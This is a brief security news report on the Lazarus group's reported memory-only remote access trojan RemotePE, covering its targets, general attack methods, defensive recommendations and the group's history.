The North Korean state-sponsored hacking group Lazarus has deployed a new memory-only remote access trojan (RAT) called RemotePE against financial institutions and cryptocurrency firms, according to cybersecurity researchers. The malware operates entirely in memory, leaving minimal forensic traces, and is designed to evade detection while exfiltrating sensitive data.
Key Details
RemotePE is a sophisticated tool that loads malicious code directly into a system’s memory without writing files to disk, making it difficult for traditional antivirus solutions to detect. The malware establishes persistence through scheduled tasks and injects itself into legitimate processes. Researchers note that Lazarus has used similar tactics in past attacks, including the hijacking of open-source projects to distribute malware.
Attack Methodology
The group reportedly gains initial access through spear-phishing emails or compromised software updates. Once inside a network, RemotePE enables remote control, data theft, and lateral movement. The malware specifically targets financial transaction systems and cryptocurrency wallets, aligning with Lazarus’s history of cybercriminal operations aimed at generating revenue for North Korea.
Defensive Recommendations
Security teams are advised to monitor for unusual memory patterns, implement application whitelisting, and restrict PowerShell usage. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has reportedly issued alerts to financial sector organizations about the new threat.
Context
Lazarus, also known as APT38, has been active since at least 2009 and is responsible for high-profile attacks including the 2014 Sony Pictures hack and the 2016 Bangladesh Bank heist. The group’s focus on cryptocurrency theft has intensified in recent years, with estimated losses exceeding $2 billion since 2018.
